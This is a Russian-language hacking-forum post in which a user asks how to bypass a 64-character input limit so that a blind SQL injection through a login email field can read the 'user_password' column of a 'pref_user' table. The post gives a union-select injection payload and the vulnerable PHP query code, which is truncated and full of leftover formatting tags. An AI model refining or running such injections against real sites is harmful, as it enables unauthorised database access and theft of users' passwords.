30.01.2019, 12:48
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
Провел на форуме:
3935
Репутация:
3
|
|
SQL.
Как обойти ограничение введённого значения в 64 символа? Отсутствует вывод на страницу.
Есть имя таблицы и столбца.
Длина нужных столбцов: 13 и 10.
Длина таблицы: 9.
Код:
'union select user_password from pref_user where user_id='1
Union подходит, без вывода.
Error-based не подходит под ограничение. Только вывод функций.
Фильтр '
.SpoilerTarget" type="button">Spoiler
[PHP]
[COLOR="#000000"] $dataInput=$_POST['email'];
$email_check=import_data($dataInput,'TEXT',64);// 64 длина символов.
functionimport_data($dataInput,$filter,$maxlen=0){
$v=$dataInput;
if ($maxlen>0)
{$v=substr($v,0,$maxlen); }
if($filter==='TEXT') {
$v=trim($v);
if (strpos($v,[COLOR="#DD0000"]'
Сам запрос в бд:
.SpoilerTarget" type="button">Spoiler
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]
$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_func_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT COUNT(*) FROM[/COLOR][COLOR="#0000BB"]$dbUsers[/COLOR][COLOR="#DD0000"]WHERE email='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]data_format[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$email_check[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_func_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"COUNT(*)"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]// ...
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sql_func_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]; }
function[/COLOR][COLOR="#0000BB"]sql_func_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$col[/COLOR][COLOR="#007700"]){
return ([/COLOR][COLOR="#0000BB"]mysql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$col[/COLOR][COLOR="#007700"])); }
[/COLOR][/COLOR]
|
|
|